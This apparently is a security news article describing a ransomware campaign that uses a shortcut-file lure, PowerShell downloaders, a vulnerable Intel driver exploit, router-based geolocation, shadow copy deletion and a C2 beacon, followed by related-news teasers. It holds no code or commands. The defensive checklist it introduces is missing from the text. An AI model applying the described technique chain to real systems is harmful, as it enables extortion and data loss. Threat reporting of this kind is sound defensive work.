A new and highly sophisticated ransomware campaign, dubbed “DOGE BIG BALLS Ransomware,” has recently come to light, demonstrating a blend of technical innovation and psychological manipulation.
This operation stands out for its multi-stage infection chain, which begins with a seemingly innocuous ZIP file and culminates in the deployment of a customized ransomware payload, all while leveraging advanced evasion techniques.
The attack typically starts with a ZIP file, often themed around financial matters such as “Pay Adjustment.zip.” Inside, a deceptive LNK (shortcut) file masquerades as a PDF or other legitimate document.
When the victim opens this shortcut, it silently executes a series of PowerShell commands.
These commands download and run a script that checks for administrative privileges and, depending on the user’s access level, downloads additional malicious files.
If administrative rights are detected, the script creates a hidden folder in the system’s startup directory and downloads a modified version of the Fog ransomware disguised as “Adobe Acrobat.exe.”
It also retrieves a kernel exploit tool, “ktool.exe,” which is crucial for the next phase of the attack.
For non-admin users, the ransomware is placed in a user-specific startup folder, likely to be triggered later.
The PowerShell scripts used in this campaign are notable for their anti-analysis features and psychological tactics.
They include provocative statements and references to real individuals, likely intended to confuse or intimidate victims and analysts.
A standout feature of this campaign is its use of the Bring Your Own Vulnerable Driver (BYOVD) technique.
The attackers exploit a known vulnerability in an Intel driver (CVE-2015-2291) to gain kernel-level access.
This allows them to escalate privileges, disable security logging, and ensure the ransomware can operate undetected.
The kernel exploit tool is executed with a process ID and a hardcoded key, acting as an execution guardrail to prevent unauthorized use.
Before encrypting files, the ransomware collects extensive system and network information, including hardware IDs, network configurations, and running processes.
Uniquely, it queries the Wigle.net API using the MAC address of the victim’s router (BSSID) to determine the physical location of the device.
This method provides far more accurate geolocation than traditional IP-based techniques, indicating a highly targeted approach.
Once executed, the ransomware displays a confirmation prompt, opens a ransom note, and logs its activities.
The ransom note references a real individual, Edward Coristine, and demands payment in Monero cryptocurrency.
The branding and references appear designed to mislead, intimidate, or malign specific individuals or organizations.
After encrypting files with the “.flocked” extension, the ransomware drops ransom notes in every affected folder and deletes shadow volume copies to prevent recovery.
The attack also embeds a Havoc C2 beacon, suggesting the potential for long-term access or further post-encryption activities.
Anti-analysis techniques, such as environment variable checks, are used to evade detection in sandboxed or monitored environments.
To defend against such advanced threats, organizations should:
The DOGE BIG BALLS ransomware campaign exemplifies the evolving sophistication of cyber threats, combining technical innovation with psychological tactics to maximize impact and evade detection.
Robust, layered security measures are essential to defend against such multi-faceted attacks.
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
A new wave of cyberattacks is targeting Active Directory (AD) environments by abusing Windows Remote…
Security researchers Nikolai Skliarenko and Yazhi Wang of Trend Micro’s Research Team have disclosed critical…
Critical vulnerability in Apache ActiveMQ (CVE-2024-XXXX) exposes brokers to denial-of-service (DoS) attacks by allowing malicious…
Cybersecurity researchers at Kaspersky have identified a new supply chain vulnerability emerging from the widespread…
UK government has unveiled plans to implement passkey technology across its digital services later this…
Significant blow to cybercriminal infrastructure, Europol has coordinated an international operation resulting in the arrest…